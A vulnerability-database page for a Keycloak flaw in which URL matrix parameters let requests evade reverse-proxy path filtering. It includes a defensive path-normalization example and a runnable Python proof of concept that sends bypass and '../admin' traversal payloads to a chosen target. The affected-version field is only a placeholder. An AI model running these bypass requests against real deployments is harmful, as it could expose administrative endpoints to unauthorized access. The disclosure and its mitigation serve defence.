Security Vulnerability Report
CVE-2026-0976 CVSS 3.7 LOW

CVE-2026-0976

Published: 2026-01-15 13:16:05
Last Modified: 2026-04-15 00:35:42

Description

A flaw was found in Keycloak. This improper input validation vulnerability occurs because Keycloak accepts RFC-compliant matrix parameters in URL path segments, while common reverse proxy configurations may ignore or mishandle them. A remote attacker can craft requests to mask path segments, potentially bypassing proxy-level path filtering. This could expose administrative or sensitive endpoints that operators believe are not externally reachable.
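An added example (not part of this advisory and not Keycloak's own code) showing why a proxy rule that compares the raw request path misses a masked segment, and how normalizing each segment the way the backend will read it closes the gap; the blocked prefix and the sample paths are constructed for illustration.

```python
from urllib.parse import unquote

# Constructed rule: the operator intends "/admin" and everything under it to be
# unreachable through the proxy. BLOCKED is an assumption for this example.
BLOCKED = "/admin"


def has_matrix_params(raw_path: str) -> bool:
    """Detection: True if any path segment carries a ';' matrix parameter.
    Useful as an access-log filter; ordinary clients rarely send these."""
    return any(";" in seg for seg in raw_path.split("/"))


def strip_matrix_params(path: str) -> str:
    """Drop ';key=value' from every segment. RFC 3986 permits ';' inside a
    segment, so '/admin;x=y/console' reaches '/admin/console' on a backend
    that honours matrix parameters, while a proxy comparing raw strings sees
    a segment named 'admin;x=y' and never matches its '/admin' rule."""
    return "/".join(seg.split(";", 1)[0] for seg in path.split("/"))


def resolve_dot_segments(path: str) -> str:
    """Collapse '.' and '..' so traversal cannot re-enter a blocked prefix."""
    out = []
    for seg in path.split("/"):
        if seg == "..":
            if out:
                out.pop()
        elif seg not in ("", "."):
            out.append(seg)
    return "/" + "/".join(out)


def normalize_path(raw_path: str) -> str:
    """Approximate the backend's view: percent-decode, strip matrix params,
    resolve dot segments. The backend's own parser remains authoritative."""
    return resolve_dot_segments(strip_matrix_params(unquote(raw_path)))


def naive_is_blocked(raw_path: str) -> bool:
    """Rule applied to the raw request path (the bypassable behaviour)."""
    return raw_path == BLOCKED or raw_path.startswith(BLOCKED + "/")


def hardened_is_blocked(raw_path: str) -> bool:
    """Same rule applied after normalization, so masked segments still match."""
    return naive_is_blocked(normalize_path(raw_path))


if __name__ == "__main__":
    for p in ("/admin/console", "/admin;matrix=hidden/console", "/realms/x"):
        print(f"{p:32} naive={naive_is_blocked(p)} hardened={hardened_is_blocked(p)}")
```

Where the proxy cannot normalize, the simpler mitigation is to reject any request whose path contains ';' before it reaches Keycloak, and to keep authorization for administrative endpoints in the application rather than relying on the proxy alone.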

CVSS Details

CVSS Score
3.7
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Keycloak < specific fixed version (see the official advisory)
Refer to the Red Hat Security Advisory RHSA-XXXX or the official Keycloak security advisory for exact version information

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-0976 PoC - Matrix Parameter Injection Bypass
# Target: Keycloak with reverse proxy that ignores matrix parameters
# Affected: Proxy path filtering bypass

import requests
import sys


def test_matrix_parameter_bypass(base_url, protected_endpoint):
    """
    Test for matrix parameter injection vulnerability
    Keycloak accepts RFC-compliant matrix parameters that proxies may ignore
    """
    # Normal request (blocked by proxy)
    normal_url = f"{base_url}{protected_endpoint}"

    # Bypass attempt using matrix parameter
    # The matrix parameter is embedded in the path segment
    bypass_url = f"{base_url}{protected_endpoint};matrix=hidden/console"

    headers = {
        "User-Agent": "CVE-2026-0976-PoC-Tester",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9",
    }

    print("[*] Testing CVE-2026-0976 Matrix Parameter Injection")
    print(f"[*] Target: {base_url}")
    print(f"[*] Protected Endpoint: {protected_endpoint}")
    print()

    # Test normal request
    print(f"[1] Testing normal request: {normal_url}")
    try:
        resp1 = requests.get(normal_url, headers=headers, timeout=10, allow_redirects=False)
        print(f"    Status: {resp1.status_code}")
    except requests.RequestException as e:
        print(f"    Error: {e}")
    print()

    # Test bypass request with matrix parameter
    print(f"[2] Testing bypass request: {bypass_url}")
    try:
        resp2 = requests.get(bypass_url, headers=headers, timeout=10, allow_redirects=False)
        print(f"    Status: {resp2.status_code}")
        if resp2.status_code == 200:
            print("    [VULNERABLE] Matrix parameter bypass may have worked!")
            print(f"    Response length: {len(resp2.content)} bytes")
        elif resp2.status_code in [301, 302, 303, 307, 308]:
            print("    [POTENTIAL] Redirect detected - check Location header")
            print(f"    Location: {resp2.headers.get('Location', 'N/A')}")
        else:
            print("    Request blocked or not found")
    except requests.RequestException as e:
        print(f"    Error: {e}")

    # Additional test cases with various matrix parameters
    test_cases = [
        f"{protected_endpoint};auth=admin",
        f"{protected_endpoint};x=/../admin",
        f"{protected_endpoint};bypass=true/../../../admin",
    ]
    print()
    print("[3] Testing additional bypass variations:")
    for i, test_path in enumerate(test_cases, 1):
        test_url = f"{base_url}{test_path}"
        print(f"    Test {i}: {test_url}")
        try:
            resp = requests.get(test_url, headers=headers, timeout=10, allow_redirects=False)
            print(f"      Status: {resp.status_code}")
        except requests.RequestException as e:
            print(f"      Error: {e}")


if __name__ == "__main__":
    if len(sys.argv) < 3:
        print("Usage: python cve_2026_0976_poc.py <base_url> <protected_endpoint>")
        print("Example: python cve_2026_0976_poc.py http://target.com /admin")
        sys.exit(1)
    base_url = sys.argv[1].rstrip('/')
    protected_endpoint = sys.argv[2]
    test_matrix_parameter_bypass(base_url, protected_endpoint)

References

https://access.redhat.com/security/cve/CVE-2026-0976
https://bugzilla.redhat.com/show_bug.cgi?id=2429869

Weakness

CWE-20 (Improper Input Validation)

Vulnerability Status

Deferred